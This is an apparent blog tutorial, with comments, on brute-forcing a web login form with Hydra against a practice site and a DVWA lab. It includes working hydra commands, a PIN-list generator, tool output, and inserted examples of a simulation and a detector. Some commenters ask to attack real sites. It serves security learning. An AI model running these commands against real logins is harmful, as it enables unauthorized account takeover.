Tuesday, September 24, 2013

Brute forcing a website login form using Hydra | Video

I have a new video that can get you past much more complex login forms and is easier to use: https://www.youtube.com/watch?v=OXIjNfX7BW8




In this video I show how to brute-force a website's login form using the automated program Hydra. The login form being attacked is attack.samsclass.info/brute.htm, challenge #4.

I also propose a possible mitigation: have your login success page include a hidden div at the top of the page containing the text from the failed-login page. The user wouldn't see it, but when Hydra scans the response for the failure text to decide whether the login succeeded, it will find that text first and treat the attempt as another failed login.
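As an added example (not code from the original post), here is a small Python simulation of the two ways a Hydra-style form checker decides that a guess worked, run against a stand-in for the brute4.php form with and without the hidden-div mitigation. The success marker "successful", the PIN 042 and the page markup are constructed for the example.

```python
# Added example (not the original post's code): simulates how a Hydra-style
# form checker decides "success", and shows that the post's hidden-div trick
# only fools a failure-string check, not a success-string check.
from typing import Callable, List

FAIL_TEXT = "Denied"      # the failure marker from the post's hydra command
OK_TEXT = "successful"    # assumed success marker (not from the original page)
GOOD_PIN = "042"          # constructed secret for the simulated form


def plain_server(pin: str) -> str:
    """Login page as attacked in the post: failure text appears only on failure."""
    if pin == GOOD_PIN:
        return f"<html><body><h1>Login {OK_TEXT}</h1></body></html>"
    return f"<html><body><p>Access {FAIL_TEXT}</p></body></html>"


def mitigated_server(pin: str) -> str:
    """The post's proposed mitigation: the success page carries a hidden div
    with the failure text, so a failure-string scan matches on success too."""
    if pin == GOOD_PIN:
        return (f'<html><body><div style="display:none">Access {FAIL_TEXT}</div>'
                f"<h1>Login {OK_TEXT}</h1></body></html>")
    return f"<html><body><p>Access {FAIL_TEXT}</p></body></html>"


def all_pins() -> List[str]:
    """Every 3-digit PIN, 000..999, like the post's Bash generator."""
    return [f"{n:03d}" for n in range(1000)]


def guesses_by_failure_string(server: Callable[[str], str]) -> List[str]:
    """Hydra's ':Denied' form: a hit is any response lacking the failure text."""
    return [p for p in all_pins() if FAIL_TEXT not in server(p)]


def guesses_by_success_string(server: Callable[[str], str]) -> List[str]:
    """Hydra's ':S=successful' form: a hit is any response containing the success text."""
    return [p for p in all_pins() if OK_TEXT in server(p)]


if __name__ == "__main__":
    print("plain, failure-string:", guesses_by_failure_string(plain_server))
    print("mitigated, failure-string:", guesses_by_failure_string(mitigated_server))
    print("mitigated, success-string:", guesses_by_success_string(mitigated_server))
```

The hidden div defeats only the failure-string check; a checker that matches on a success string instead (the `S=` form) still finds the PIN, so the mitigation raises the bar only against the default configuration.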

Here is the actual command I used in the video; note that uName.txt and uPass.txt point to the files on my desktop:


hydra -L uName.txt -P uPass.txt attack.samsclass.info http-get-form "/brute4.php:login=^USER^&pin=^PASS^:Denied"
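Also added here (not from the original post): the defender's view of the same command, a detector that tallies form submissions to /brute4.php per client over a sliding window and flags clients that exceed a threshold. The Apache-style log lines, IPs, timestamps, window and threshold are all constructed for the example.

```python
# Added example, not part of the original post: flags the request burst that the
# post's hydra http-get-form command produces. Log lines, IPs and timestamps below
# are constructed Apache-style samples, not real traffic.
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOGIN_PATH = "/brute4.php"      # endpoint from the post's hydra command
WINDOW = timedelta(seconds=60)  # assumed sliding window
THRESHOLD = 20                  # assumed; tune to the site's normal traffic
# groups: client ip, timestamp, method, request target, status code
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

def parse(line):
    """Return (ip, time, path, has_query) or None for an unparseable line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, _method, target, _status = m.groups()
    when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
    path, _, query = target.partition("?")
    return ip, when, path, bool(query)

def detect(lines):
    """Map client IP -> total login submissions, for every client that sent
    THRESHOLD or more submissions to LOGIN_PATH inside one WINDOW."""
    attempts = defaultdict(list)
    for rec in map(parse, lines):
        if rec and rec[2] == LOGIN_PATH and rec[3]:   # form submissions only
            attempts[rec[0]].append(rec[1])
    flagged = {}
    for ip, times in attempts.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while t - times[start] > WINDOW:          # slide the window start
                start += 1
            if end - start + 1 >= THRESHOLD:
                flagged[ip] = len(times)
                break
    return flagged

# constructed sample: one client submits 25 PINs in 25 seconds, another logs in once
SAMPLE = [
    f'203.0.113.9 - - [24/Sep/2013:10:00:{i:02d} +0000] "GET {LOGIN_PATH}?login=admin&pin={i:03d} HTTP/1.1" 200 512'
    for i in range(25)
] + [
    '198.51.100.7 - - [24/Sep/2013:10:00:05 +0000] "GET /brute4.php?login=bob&pin=123 HTTP/1.1" 200 640',
    '198.51.100.7 - - [24/Sep/2013:10:00:06 +0000] "GET /brute.htm HTTP/1.1" 200 900',
]
```

Calling `detect(SAMPLE)` flags only the burst client; the single legitimate login stays below the threshold.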

Here is a quick Bash script to generate the 3-digit passwords:
#!/bin/bash
# print every 3-digit PIN from 000 to 999, one per line
for i in 0 1 2 3 4 5 6 7 8 9
do
  for j in 0 1 2 3 4 5 6 7 8 9
  do
    for k in 0 1 2 3 4 5 6 7 8 9
    do
      echo "$i$j$k"
    done
  done
done
You can download the script here, but you will most likely need to run `chmod +x NumberGen.sh` on the file so that it can be executed by typing `./NumberGen.sh`. If you want the output of this script written to a text file, use output redirection with `>`, so the terminal syntax would be `./NumberGen.sh > newFileName.txt`. Or you can just download the text file that has all 1000 numbers here.

Due to all the requests I get for a password list, I have included the 10,000 most common passwords people use. I found the list online, and I believe it is ordered from most common to least.

If you like my videos, please subscribe to me on YouTube:
http://www.youtube.com/subscription_center?add_user=GarrettFogerlie

Follow me on Twitter, @gFogerlie and Google+ https://plus.google.com/+GarrettFogerlie

If you have a video request you can let me know in the comments here or on my channel:
https://www.youtube.com/user/GarrettFogerlie/discussion



19 comments:

  1. Hey Garrett, I saw the page http://attack.samsclass.info/samsgame1/level0.php. Was wondering how you brute force a password without the need for username=^USER^?

    Replies
    1. This comment has been removed by the author.

    2. In my previous answer, change "http-form-post" to "http-post-form". This is the correct syntax, although I don't think Hydra cares, as I believe "http-form-post" was the original way of doing it, since I see it referenced in old tutorials.

      I tested the standard 10,000 worst passwords with the string above, (changing the "-p password" to "-P passFile.txt") with no luck.

    3. Hello, please your skype Garett Forgerlie

    4. You may email me at garrett@azinstall.net however I will not help with anything illegal, so please don't ask.

  2. hey, loved the tutorial. I was wondering if it was possible to whitelist a URI instead of blacklisting a string using hydra? For instance if you know a successful login redirects you to site.com/protected, is it possible to set up hydra so that when you get a 200 response from site.com/protected, it saves the login? thanks.

    Replies
    1. My understanding is that Hydra will search the response from the server for whatever you're looking for. As per my example, if you know what a success should look like then you would change this: "/brute4.php:login=^USER^&pin=^PASS^:Denied"

      to this:
      "/brute4.php:login=^USER^&pin=^PASS^:S=successful"

      In your case, I would think this would work:
      "/brute4.php:login=^USER^&pin=^PASS^:S=site.com/protected"

      "The 'failure' or 'success' string does not have to be part of the HTML of the page. These strings could be information in the response headers, such as cookies being set, or locations of redirects. There are flexible options for dealing with pretty much any type of response, as long as it is repeatable, and there are distinct differences between success and failure." http://insidetrust.blogspot.com/2011/08/using-hydra-to-dictionary-attack-web.html

    2. MAJOR THANKS!!!! YOU'RE AWESOME.

  3. But it's not always action="login.php", I mean a PHP page; I found a form that submits its action to an HTML page and I don't know what to do :/

    Replies
    1. I'm not entirely sure what you mean, but if I understand correctly you have a login form and are unsure where it submits to? Let's say we are at a webpage, http://site.com/index.html, and there is a login form.

      If you look at the HTML, you should see a <form ...> tag. If it says action="page.html", then the URL you submit your login information to is http://site.com/page.html. If there is no action="" in the form tag, then you submit your login information to the page you are on, http://site.com/index.html.

      Hope this helps get you going, let me know if you have further questions.

  4. I was studying using DVWA in Metasploitable 2:
    hydra -L user.txt -P Found.dic 192.168.56.101 http-get-form "/dvwa/vulnerabilities/brute/#:username=^USER^&password=^PASS^&submit=Login:Username and/or password incorrect." -v

    I got almost 48 results and none are correct. Help please.

    Replies
    1. I didn't have time to look into it, but on first glance I'd try changing, "Username and/or password incorrect." to "incorrect"

    2. Tried using 'incorrect' before and once again now, but the result is still the same. Whichever password file I use, the first 48 passwords are accepted.

      Here is the output.
      PS: Deleted some VERBOSE output and passwords in between to reduce the comment length. Thank you.

      hydra -L user.txt -P Found.dic 192.168.56.101 http-get-form "/dvwa/vulnerabilities/brute/#:username=^USER^&password=^PASS^&submit=Login:incorrect" -v
      Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

      Hydra (http://www.thc.org/thc-hydra) starting at 2014-07-17 10:27:20
      [DATA] 16 tasks, 1 server, 8811375 login tries (l:3/p:2937125), ~550710 tries per task
      [DATA] attacking service http-get-form on port 80
      [VERBOSE] Resolving addresses ... done
      [VERBOSE] Page redirected to http://192.168.56.101/dvwa/vulnerabilities/brute/../../login.php
      [80][www-form] host: 192.168.56.101 login: admin password: !!!!!!
      [80][www-form] host: 192.168.56.101 login: admin password: !!!
      [80][www-form] host: 192.168.56.101 login: admin password: !!!$QWER
      [VERBOSE] Page redirected to http://192.168.56.101/dvwa/vulnerabilities/brute/../../login.php
      [80][www-form] host: 192.168.56.101 login: root password: !!!
      [80][www-form] host: 192.168.56.101 login: root password: !!!!!!!!
      [80][www-form] host: 192.168.56.101 login: root password: !!!!@@@@
      [80][www-form] host: 192.168.56.101 login: root password: !!!!????
      [80][www-form] host: 192.168.56.101 login: root password: !!!""�
      [80][www-form] host: 192.168.56.101 login: root password: !!!!123
      [80][www-form] host: 192.168.56.101 login: root password: !!!!!!!!!!2345
      [80][www-form] host: 192.168.56.101 login: root password: !!!!!!\"
      [80][www-form] host: 192.168.56.101 login: root password: !!!$QWER
      [80][www-form] host: 192.168.56.101 login: administrator password: !
      [STATUS] attack finished for 192.168.56.101 (waiting for children to complete tests)
      [VERBOSE] Page redirected to http://192.168.56.101/dvwa/vulnerabilities/brute/../../login.php
      [VERBOSE] Page redirected to http://192.168.56.101/dvwa/vulnerabilities/brute/../../login.php
      [VERBOSE] Page redirected to http://192.168.56.101/dvwa/vulnerabilities/brute/../../login.php
      [VERBOSE] Page redirected to http://192.168.56.101/dvwa/vulnerabilities/brute/../../login.php
      [VERBOSE] Page redirected to http://192.168.56.101/dvwa/vulnerabilities/brute/../../login.php
      [VERBOSE] Page redirected to http://192.168.56.101/dvwa/vulnerabilities/brute/../../login.php
      [80][www-form] host: 192.168.56.101 login: administrator password: !!
      [VERBOSE] Page redirected to http://192.168.56.101/dvwa/vulnerabilities/brute/../../login.php
      [VERBOSE] Page redirected to http://192.168.56.101/dvwa/vulnerabilities/brute/../../login.php
      [80][www-form] host: 192.168.56.101 login: administrator password: !!!!!!
      [80][www-form] host: 192.168.56.101 login: administrator password: !!!!!!!!!!2345
      [80][www-form] host: 192.168.56.101 login: administrator password: !!!
      [80][www-form] host: 192.168.56.101 login: administrator password: !!!!!!!!
      [80][www-form] host: 192.168.56.101 login: administrator password: !!!!!2
      [80][www-form] host: 192.168.56.101 login: administrator password: !!!!!!\"
      [80][www-form] host: 192.168.56.101 login: administrator password: !!!!@@@@
      [80][www-form] host: 192.168.56.101 login: administrator password: !!!!lili!!!!
      [80][www-form] host: 192.168.56.101 login: administrator password: !!!!ralf!!!!
      [80][www-form] host: 192.168.56.101 login: administrator password: !!!!123
      [80][www-form] host: 192.168.56.101 login: administrator password: !!!!????
      [80][www-form] host: 192.168.56.101 login: administrator password: !!!""�
      [80][www-form] host: 192.168.56.101 login: administrator password: !!!$QWER
      [80][www-form] host: 192.168.56.101 login: administrator password: !!!..11
      1 of 1 target successfully completed, 48 valid passwords found
      Hydra (http://www.thc.org/thc-hydra) finished at 2014-07-17 10:27:35

    3. It looks like you are trying to submit to the wrong page. It looks like there must be some JavaScript that does the logging in (that's what the '#' is). Try this URL instead: /dvwa/vulnerabilities/brute/index.php

      You can also disable JavaScript in your browser to see if things change. This should be the entire command:

      hydra -L user.txt -P Found.dic 192.168.56.101 http-get-form "/dvwa/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect." -v

      If that doesn't work, verify your Found.dic file is just a plain text file and maybe change the extension to txt. I doubt this would be an issue but who knows.

    4. Tried index.php and login.php, tried different password files with a txt extension. None works. Tried "incorrect" and "Username and/or password incorrect." Results are the same. Thank you.

    5. Give the following a shot, I found it here: http://www.techgaun.com/2012/02/brute-force-vulnerability-damn.html

      hydra -L user.txt -P Found.dic 192.168.56.101 http-get-form "/dvwa/vulnerabilities/brute/?username=^USER^&password=^PASS^&Login=Login:incorrect" -v

      If this doesn't work, I'll install DVWA and play around with it tonight or tomorrow. Let me know what happens.

    6. Tried it before itself. Tried it now again. Still the same. I believe we should use a ':' before username while using Hydra, right? Without using the ':' I get an error message. Thank you.

  5. Can you use this for sites like Google and Facebook?

  6. hey hack a web for me
    www.mayoschoolonline.com/phpmyadmin
